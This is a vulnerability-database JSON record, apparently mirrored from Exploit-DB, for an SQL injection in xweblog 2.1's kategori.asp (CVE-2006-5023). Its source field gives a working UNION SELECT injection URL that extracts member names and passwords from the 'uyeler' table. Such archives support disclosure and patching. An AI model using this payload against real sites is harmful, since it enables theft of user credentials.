{"id": "EDB-ID:2416", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "xweblog 2.1 - 'kategori.asp' SQL Injection", "description": "", "published": "2006-09-22T00:00:00", "modified": "2006-09-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/2416", "reporter": "Muhacir", "references": [], "cvelist": ["2006-5023"], "immutableFields": [], "lastseen": "2022-08-16T07:02:30", "viewCount": 17, "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2006-5023"]}]}, "exploitation": null, "vulnersScore": 0.2}, "_state": {"dependencies": 1661182887, "score": 1661176728}, "_internal": {"score_hash": "40dc3e25c641f23b4459e67b4868e7f0"}, "sourceHref": "https://www.exploit-db.com/download/2416", "sourceData": "# xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability\r\n\r\n# Author : Muhacir\r\n\r\n# Source : http://www.aspindir.com/goster/4386\r\n\r\n# Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler\r\n\r\n# Greetz To : str0ke :)\r\n\r\n# milw0rm.com [2006-09-22]", "osvdbidlist": ["29103"], "exploitType": "webapps", "verified": true}
{}